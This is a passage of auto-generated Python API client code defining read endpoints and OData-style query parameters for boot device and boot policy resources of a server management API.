apply (str): Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.. [optional]
count (bool): The $count query specifies the service should return the count of the matching resources, instead of returning the resources.. [optional]
inlinecount (str): The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.. [optional] if omitted the server will use the default value of "allpages"
at (str): Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.. [optional]
tags (str): The 'tags' parameter is used to request a summary of the Tag utilization for this resource. When the 'tags' parameter is specified, the response provides a list of tag keys, the number of times the key has been used across all documents, and the tag values that have been assigned to the tag key.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BootPchStorageDeviceResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.get_boot_pch_storage_device_list = _Endpoint(
settings={
'response_type': (BootPchStorageDeviceResponse,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/boot/PchStorageDevices',
'operation_id': 'get_boot_pch_storage_device_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'filter',
'orderby',
'top',
'skip',
'select',
'expand',
'apply',
'count',
'inlinecount',
'at',
'tags',
],
'required': [],
'nullable': [
],
'enum': [
'inlinecount',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('inlinecount',): {
"ALLPAGES": "allpages",
"NONE": "none"
},
},
'openapi_types': {
'filter':
(str,),
'orderby':
(str,),
'top':
(int,),
'skip':
(int,),
'select':
(str,),
'expand':
(str,),
'apply':
(str,),
'count':
(bool,),
'inlinecount':
(str,),
'at':
(str,),
'tags':
(str,),
},
'attribute_map': {
'filter': '$filter',
'orderby': '$orderby',
'top': '$top',
'skip': '$skip',
'select': '$select',
'expand': '$expand',
'apply': '$apply',
'count': '$count',
'inlinecount': '$inlinecount',
'at': 'at',
'tags': 'tags',
},
'location_map': {
'filter': 'query',
'orderby': 'query',
'top': 'query',
'skip': 'query',
'select': 'query',
'expand': 'query',
'apply': 'query',
'count': 'query',
'inlinecount': 'query',
'at': 'query',
'tags': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_boot_pch_storage_device_list
)
def __get_boot_precision_policy_by_moid(
self,
moid,
**kwargs
):
"""Read a 'boot.PrecisionPolicy' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_boot_precision_policy_by_moid(moid, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BootPrecisionPolicy
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
return self.call_with_http_info(**kwargs)
self.get_boot_precision_policy_by_moid = _Endpoint(
settings={
'response_type': (BootPrecisionPolicy,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/boot/PrecisionPolicies/{Moid}',
'operation_id': 'get_boot_precision_policy_by_moid',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'moid',
],
'required': [
'moid',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
},
'attribute_map': {
'moid': 'Moid',
},
'location_map': {
'moid': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_boot_precision_policy_by_moid
)
def __get_boot_precision_policy_list(
self,
**kwargs
):
"""Read a 'boot.PrecisionPolicy' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_boot_precision_policy_list(async_req=True)
>>> result = thread.get()
Keyword Args:
filter (str): Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).. [optional] if omitted the server will use the default value of ""
orderby (str): Determines what properties are used to sort the collection of resources.. [optional]
top (int): Specifies the maximum number of resources to return in the response.. [optional] if omitted the server will use the default value of 100
skip (int): Specifies the number of resources to skip in the response.. [optional] if omitted the server will use the default value of 0
select (str): Specifies a subset of properties to return.. [optional] if omitted the server will use the default value of ""
expand (str): Specify additional attributes or related resources to return in addition to the primary resources.. [optional]
apply (str): Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.. [optional]
count (bool): The $count query specifies the service should return the count of the matching resources, instead of returning the resources.. [optional]
inlinecount (str): The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.. [optional] if omitted the server will use the default value of "allpages"
at (str): Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.. [optional]
tags (str): The 'tags' parameter is used to request a summary of the Tag utilization for this resource. When the 'tags' parameter is specified, the response provides a list of tag keys, the number of times the key has been used across all documents, and the tag values that have been assigned to the tag key.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BootPrecisionPolicyResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.get_boot_precision_policy_list = _Endpoint(
settings={
'response_type': (BootPrecisionPolicyResponse,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/boot/PrecisionPolicies',
'operation_id': 'get_boot_precision_policy_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'filter',
'orderby',
'top',
'skip',
'select',
'expand',
'apply',
'count',
'inlinecount',
'at',
'tags',
],
'required': [],
'nullable': [
],
'enum': [
'inlinecount',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('inlinecount',): {
"ALLPAGES": "allpages",
"NONE": "none"
},
},
'openapi_types': {
'filter':
(str,),
'orderby':
(str,),
'top':
(int,),
'skip':
(int,),
'select':
(str,),
'expand':
(str,),
'apply':
(str,),
'count':
(bool,),
'inlinecount':
(str,),
'at':
(str,),
'tags':
(str,),
},
'attribute_map': {
'filter': '$filter',
'orderby': '$orderby',
'top': '$top',
'skip': '$skip',
'select': '$select',
'expand': '$expand',
'apply': '$apply',
'count': '$count',
'inlinecount': '$inlinecount',
'at': 'at',
'tags': 'tags',
},
'location_map': {
'filter': 'query',
'orderby': 'query',
'top': 'query',
'skip': 'query',
'select': 'query',
'expand': 'query',
'apply': 'query',
'count': 'query',
'inlinecount': 'query',
'at': 'query',
'tags': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_boot_precision_policy_list
)
def __get_boot_pxe_device_by_moid(
self,
moid,
**kwargs
):
"""Read a 'boot.PxeDevice' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_boot_pxe_device_by_moid(moid, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BootPxeDevice
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
return self.call_with_http_info(**kwargs)
self.get_boot_pxe_device_by_moid = _Endpoint(
settings={
'response_type': (BootPxeDevice,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/boot/PxeDevices/{Moid}',
'operation_id': 'get_boot_pxe_device_by_moid',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'moid',
],
'required': [
'moid',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
},
'attribute_map': {
'moid': 'Moid',
},
'location_map': {
'moid': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_boot_pxe_device_by_moid
)
def __get_boot_pxe_device_list(
self,
**kwargs
):
"""Read a 'boot.PxeDevice' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_boot_pxe_device_list(async_req=True)
>>> result = thread.get()
Keyword Args:
filter (str): Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).. [optional] if omitted the server will use the default value of ""
orderby (str): Determines what properties are used to sort the collection of resources.. [optional]
top (int): Specifies the maximum number of resources to return in the response.. [optional] if omitted the server will use the default value of 100
skip (int): Specifies the number of resources to skip in the response.. [optional] if omitted the server will use the default value of 0
select (str): Specifies a subset of properties to return.. [optional] if omitted the server will use the default value of ""
expand (str): Specify additional attributes or related resources to return in addition to the primary resources.. [optional]
apply (str): Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.. [optional]
count (bool): The $count query specifies the service should return the count of the matching resources, instead of returning the resources.. [optional]
inlinecount (str): The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.. [optional] if omitted the server will use the default value of "allpages"
at (str): Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.. [optional]
tags (str): The 'tags' parameter is used to request a summary of the Tag utilization for this resource. When the 'tags' parameter is specified, the response provides a list of tag keys, the number of times the key has been used across all documents, and the tag values that have been assigned to the tag key.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BootPxeDeviceResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.get_boot_pxe_device_list = _Endpoint(
settings={
'response_type': (BootPxeDeviceResponse,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/boot/PxeDevices',
'operation_id': 'get_boot_pxe_device_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'filter',
'orderby',
'top',
'skip',
'select',
'expand',
'apply',
'count',
'inlinecount',
'at',
'tags',
],
'required': [],
'nullable': [
],
'enum': [
'inlinecount',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('inlinecount',): {
"ALLPAGES": "allpages",
"NONE": "none"
},
},
'openapi_types': {
'filter':
(str,),
'orderby':
(str,),
'top':
(int,),
'skip':
(int,),
'select':
(str,),
'expand':
(str,),
'apply':
(str,),
'count':
(bool,),
'inlinecount':
(str,),
'at':
(str,),
'tags':
(str,),
},
'attribute_map': {
'filter': '$filter',
'orderby': '$orderby',
'top': '$top',
'skip': '$skip',
'select': '$select',
'expand': '$expand',
'apply': '$apply',
'count': '$count',
'inlinecount': '$inlinecount',
'at': 'at',
'tags': 'tags',
},
'location_map': {
'filter': 'query',
'orderby': 'query',
'top': 'query',
'skip': 'query',
'select': 'query',
'expand': 'query',
'apply': 'query',
'count': 'query',
'inlinecount': 'query',
'at': 'query',
'tags': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_boot_pxe_device_list
)
def __get_boot_san_device_by_moid(
self,
moid,
**kwargs
):
"""Read a 'boot.SanDevice' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_boot_san_device_by_moid(moid, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BootSanDevice
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
return self.call_with_http_info(**kwargs)
self.get_boot_san_device_by_moid = _Endpoint(
settings={
'response_type': (BootSanDevice,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/boot/SanDevices/{Moid}',
'operation_id': 'get_boot_san_device_by_moid',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'moid',
],
'required': [
'moid',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
},
'attribute_map': {
'moid': 'Moid',
},
'location_map': {
'moid': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_boot_san_device_by_moid
)
def __get_boot_san_device_list(
self,
**kwargs
):
"""Read a 'boot.SanDevice' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_boot_san_device_list(async_req=True)
>>> result = thread.get()
Keyword Args:
filter (str): Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).. [optional] if omitted the server will use the default value of ""
orderby (str): Determines what properties are used to sort the collection of resources.. [optional]
top (int): Specifies the maximum number of resources to return in the response.. [optional] if omitted the server will use the default value of 100
skip (int): Specifies the number of resources to skip in the response.. [optional] if omitted the server will use the default value of 0
select (str): Specifies a subset of properties to return.. [optional] if omitted the server will use the default value of ""
expand (str): Specify additional attributes or related resources to return in addition to the primary resources.. [optional]
apply (str): Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.. [optional]
count (bool): The $count query specifies the service should return the count of the matching resources, instead of returning the resources.. [optional]
inlinecount (str): The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.. [optional] if omitted the server will use the default value of "allpages"
at (str): Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.. [optional]
tags (str): The 'tags' parameter is used to request a summary of the Tag utilization for this resource. When the 'tags' parameter is specified, the response provides a list of tag keys, the number of times the key has been used across all documents, and the tag values that have been assigned to the tag key.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BootSanDeviceResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.get_boot_san_device_list = _Endpoint(
settings={
'response_type': (BootSanDeviceResponse,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/boot/SanDevices',
'operation_id': 'get_boot_san_device_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'filter',
'orderby',
'top',
'skip',
'select',
'expand',
'apply',
'count',
'inlinecount',
'at',
'tags',
],
'required': [],
'nullable': [
],
'enum': [
'inlinecount',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('inlinecount',): {
"ALLPAGES": "allpages",
"NONE": "none"
},
},
'openapi_types': {
'filter':
(str,),
'orderby':
(str,),
'top':
(int,),
'skip':
(int,),
'select':
(str,),
'expand':
(str,),
'apply':
(str,),
'count':
(bool,),
'inlinecount':
(str,),
'at':
(str,),
'tags':
(str,),
},
'attribute_map': {
'filter': '$filter',
'orderby': '$orderby',
'top': '$top',
'skip': '$skip',
'select': '$select',
'expand': '$expand',
'apply': '$apply',
'count': '$count',
'inlinecount': '$inlinecount',
'at': 'at',
'tags': 'tags',
},
'location_map': {
'filter': 'query',
'orderby': 'query',
'top': 'query',
'skip': 'query',
'select': 'query',
'expand': 'query',
'apply': 'query',
'count': 'query',
'inlinecount': 'query',
'at': 'query',
'tags': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_boot_san_device_list
)
def __get_boot_sd_device_by_moid(
self,
moid,
**kwargs
):
"""Read a 'boot.SdDevice' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_boot_sd_device_by_moid(moid, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BootSdDevice
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
return self.call_with_http_info(**kwargs)
self.get_boot_sd_device_by_moid = _Endpoint(
settings={
'response_type': (BootSdDevice,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/boot/SdDevices/{Moid}',
'operation_id': 'get_boot_sd_device_by_moid',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'moid',
],
'required': [
'moid',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
},
'attribute_map': {
'moid': 'Moid',
},
'location_map': {
'moid': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_boot_sd_device_by_moid
)
def __get_boot_sd_device_list(
self,
**kwargs
):
"""Read a 'boot.SdDevice' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_boot_sd_device_list(async_req=True)
>>> result = thread.get()
Keyword Args:
filter (str): Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).. [optional] if omitted the server will use the default value of ""
orderby (str): Determines what properties are used to sort the collection of resources.. [optional]
